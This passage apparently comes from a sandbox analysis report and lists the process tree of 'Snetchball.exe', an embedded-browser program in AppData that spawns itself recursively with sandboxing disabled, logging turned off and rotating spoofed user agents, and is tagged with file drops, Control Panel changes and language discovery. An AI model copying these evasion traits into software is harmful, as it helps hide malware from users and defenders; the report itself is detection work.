    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

  [depth 13] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 3064)
    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3224 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

    [depth 14] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5348)
      command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
      behaviour: Modifies Control Panel

      [depth 15] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5412)
        command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        behaviour: Drops file in Windows directory; Checks SCSI registry key(s); Modifies Control Panel

        [depth 16] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4724)
          command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2804 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

        [depth 16] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4156)
          command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3104 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
          behaviour: System Location Discovery: System Language Discovery

        [depth 16] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4768)
          command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3108 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

        [depth 16] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5580)
          command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3128 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
          behaviour: System Location Discovery: System Language Discovery

          [depth 17] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 3164)
            command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
            behaviour: Modifies Control Panel

            [depth 18] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5912)
              command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
              behaviour: Drops file in Windows directory; Modifies Control Panel

              [depth 19] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 6052)
                command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2796 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

              [depth 19] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4676)
                command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                behaviour: System Location Discovery: System Language Discovery

              [depth 19] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 3400)
                command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3104 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

              [depth 19] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 888)
                command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3124 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

              [depth 19] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5712)
                command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

              [depth 19] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 3604)
                command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3952 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

                [depth 20] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 2120)
                  command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                  behaviour: System Location Discovery: System Language Discovery; Modifies Control Panel

                  [depth 21] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 580)
                    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                    behaviour: Drops file in Windows directory; Modifies Control Panel

                    [depth 22] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5752)
                      command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2796 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

                    [depth 22] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 2660)
                      command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

                    [depth 22] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5168)
                      command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3124 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

                    [depth 22] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 6020)
                      command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                      behaviour: System Location Discovery: System Language Discovery

                    [depth 22] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5296)
                      command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3148 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

                      [depth 23] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5260)
                        command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                        behaviour: Drops file in Windows directory; System Location Discovery: System Language Discovery; Modifies Control Panel

                        [depth 24] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4644)
                          command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.2" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2800 --field-trial-handle=2808,i,11701412828149059620,4505377049796945242,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                          behaviour: System Location Discovery: System Language Discovery

                        [depth 24] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5396)
                          command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.2" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2956 --field-trial-handle=2808,i,11701412828149059620,4505377049796945242,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

                        [depth 24] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4068)
                          command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.2" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2992 --field-trial-handle=2808,i,11701412828149059620,4505377049796945242,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                          behaviour: System Location Discovery: System Language Discovery

                        [depth 24] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 3972)
                          command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.2" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=2808,i,11701412828149059620,4505377049796945242,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

                        [depth 24] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 2800)
                          command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.2" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=2808,i,11701412828149059620,4505377049796945242,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

                          [depth 25] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 7000)
                            command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                            behaviour: Drops file in Windows directory; Modifies Control Panel

                            [depth 26] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4872)
                              command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2812 --field-trial-handle=2816,i,1498905386811001148,6325913936665718805,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                              behaviour: System Location Discovery: System Language Discovery

                            [depth 26] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4908)
                              command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2816,i,1498905386811001148,6325913936665718805,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

                            [depth 26] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 3320)
                              command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3132 --field-trial-handle=2816,i,1498905386811001148,6325913936665718805,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

                            [depth 26] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 2136)
                              command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3152 --field-trial-handle=2816,i,1498905386811001148,6325913936665718805,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

                            [depth 26] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 1916)
                              command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=2816,i,1498905386811001148,6325913936665718805,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

                          [depth 25] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 7036)
                            command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                            behaviour: System Location Discovery: System Language Discovery

                          [depth 25] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 7084)
                            command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                            behaviour: System Location Discovery: System Language Discovery

                          [depth 25] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 7124)
                            command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                          [depth 25] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5856)
                            command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                          [depth 25] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 484)
                            command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                            behaviour: System Location Discovery: System Language Discovery

                      [depth 23] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 3136)
                        command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                      [depth 23] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5896)
                        command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                      [depth 23] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5144)
                        command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                      [depth 23] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5384)
                        command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                      [depth 23] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5964)
                        command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                    [depth 22] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 3992)
                      command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1952 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                      behaviour: System Location Discovery: System Language Discovery

                  [depth 21] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 2676)
                    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                    behaviour: System Location Discovery: System Language Discovery

                  [depth 21] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 6100)
                    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                  [depth 21] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4544)
                    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                  [depth 21] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5896)
                    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                  [depth 21] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 3284)
                    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                [depth 20] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5344)
                  command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                  behaviour: System Location Discovery: System Language Discovery

